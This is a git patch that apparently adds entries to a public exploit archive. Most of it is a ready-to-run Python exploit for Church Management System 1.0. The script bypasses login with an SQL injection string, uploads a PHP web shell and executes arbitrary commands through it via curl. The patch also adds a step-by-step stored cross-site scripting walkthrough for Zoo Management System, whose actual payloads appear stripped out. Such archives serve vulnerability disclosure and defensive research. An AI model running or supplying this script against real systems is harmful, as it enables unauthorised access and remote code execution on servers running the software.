From efd4a69880a2f7540442356f3aef233769b1e6a1 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 10 Jul 2021 05:01:53 +0000 Subject: [PATCH] DB: 2021-07-10 3 changes to exploits/shellcodes Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS) --- exploits/php/webapps/50116.py | 56 ++++++++++++++++++++++++++++++++ exploits/php/webapps/50117.txt | 45 +++++++++++++++++++++++++ exploits/windows/local/50083.txt | 1 + files_exploits.csv | 2 ++ 4 files changed, 104 insertions(+) create mode 100755 exploits/php/webapps/50116.py create mode 100644 exploits/php/webapps/50117.txt diff --git a/exploits/php/webapps/50116.py b/exploits/php/webapps/50116.py new file mode 100755 index 000000000..b43d08e7a --- /dev/null +++ b/exploits/php/webapps/50116.py @@ -0,0 +1,56 @@ +# Exploit Title: Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE +# Date: 05-07-2021 +# Exploit Author: Eleonora Guardini (eleguardini93 at gmail dot com or eleonora.guardini at dedagroup dot com) +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html +# Version: 1.0 +# Tested On: Ubuntu 18.04 with apache2 2.4.29 (Ubuntu) + +import requests +from requests_toolbelt.multipart.encoder import MultipartEncoder +import random +import os, sys +import argparse +import optparse +import string + +if len(sys.argv)!=5: + print('Usage: -u http:// -c <"command">') + print('ex. python3 http://192.168.1.2 -c "ls+-la"') + exit() + +parser = optparse.OptionParser() +parser.add_option('-u', '--url', action="store", dest="url") +parser.add_option('-c', '--cmd', action="store", dest="cmd") +options,args=parser.parse_args() + +print(options.url, options.cmd) +print(len(sys.argv)) + +def randomGen(size=8, chars=string.ascii_lowercase): + return ''.join(random.choice(chars) for _ in range(size)) + +urlbase=options.url+'/cman/admin'; +loginUrl=urlbase+'/index.php'; + +shellFile=randomGen()+".php" + +payload={"username":"test", "password":"' or 'a'='a'#", "login":""}; + +proxies = { "http": "http://localhost:8080"} + +mp_encoder = MultipartEncoder(fields = { + "image":(shellFile,"","application/x-php"), + "change":""}) + +session=requests.Session() +r=session.post(loginUrl, payload, allow_redirects=False) #, proxies=proxies) +cookie=r.headers["Set-Cookie"] + +headers = {"Cookie": cookie, 'Content-Type':mp_encoder.content_type} + +uploadUrl=urlbase+"/admin_pic.php" + +post=session.post(uploadUrl, data=mp_encoder, allow_redirects=False, headers=headers, proxies=proxies) + +os.system("curl " + urlbase + "/uploads/" + shellFile + "?cmd="+ options.cmd) \ No newline at end of file diff --git a/exploits/php/webapps/50117.txt b/exploits/php/webapps/50117.txt new file mode 100644 index 000000000..5640dc3da --- /dev/null +++ b/exploits/php/webapps/50117.txt @@ -0,0 +1,45 @@ +# Exploit Title: Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS) +# Date: 08/07/2021 +# Exploit Author: Subhadip Nag +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/zoo-management-system-using-php-and-mysql/ +# Version: 1.0 +# Tested on: Server: XAMPP + +# Description # + +Zoo Management System 1.0 is vulnerable to 'Multiple' stored cross site scripting because of insufficient user supplied data. + +# Proof of Concept (PoC) : Exploit # + +1) Goto: http://localhost/ZMSP/zms/admin/index.php and Login(given User & password) +2) Goto: http://localhost/ZMSP/zms/admin/add-animals.php +3) Fill out Animal name, Breed and Description with given payload: +4) Goto: http://localhost/ZMSP/zms/admin/manage-animals.php +5) Stored XSS payload is fired + +6) Goto: http://localhost/ZMSP/zms/admin/manage-ticket.php +7) Edit any Action field with the following payload: and Update +8) Go back and again click 'Manage Type Ticket' +9) Stored XSS payload is fired + +10) Goto: http://localhost/ZMSP/zms/admin/aboutus.php +11) In the Page 'Title' & 'Description',Enter the Payload: and Click Update + +12) Goto: http://localhost/ZMSP/zms/admin/contactus.php +13) Put the Same Payload in the Page 'Title' & 'Description' and Click Update +14) Logout and click 'Back Home' +15) Our XSS payload successful + + +# Image PoC : Reference Image # + +1) https://ibb.co/g4hFQDV +2) https://ibb.co/frbpf9c +3) https://ibb.co/NtKrc9C +4) https://ibb.co/cFGWhCz +4) https://ibb.co/CMXmN4f +5) https://ibb.co/C0dV0PC +6) https://ibb.co/4ZW8tb3 +7) https://ibb.co/3zgFq9b +8) https://ibb.co/wS8wXj8 \ No newline at end of file diff --git a/exploits/windows/local/50083.txt b/exploits/windows/local/50083.txt index ffce49ae1..1b8a31b12 100644 --- a/exploits/windows/local/50083.txt +++ b/exploits/windows/local/50083.txt @@ -4,6 +4,7 @@ # Vendor Homepage: http://nica.it - http://winwastenet.com # Version: 1.0.6183.16475 # Tested on: Windows 10 Pro x64 - 20H2 and 21H1 +# CVE: CVE-2021-34110 WinWaste.NET version 1.0.6183.16475 (from Nica s.r.l., a Zucchetti Group company) allows a local unprivileged user to replace the executable with a malicious file that will be executed with "LocalSystem" privileges. diff --git a/files_exploits.csv b/files_exploits.csv index efcf9f0c4..641595811 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44253,3 +44253,5 @@ id,file,description,date,author,type,platform,port 50113,exploits/multiple/webapps/50113.txt,"Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE)",2021-07-08,"Patrik Lantz",webapps,multiple, 50114,exploits/php/webapps/50114.py,"Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated)",2021-07-08,faisalfs10x,webapps,php, 50115,exploits/php/webapps/50115.py,"Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)",2021-07-08,"Ron Jost",webapps,php, +50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",2021-07-09,"Eleonora Guardini",webapps,php, +50117,exploits/php/webapps/50117.txt,"Zoo Management System 1.0 - 'Multiple' Stored Cross-Site-Scripting (XSS)",2021-07-09,"Subhadip Nag",webapps,php,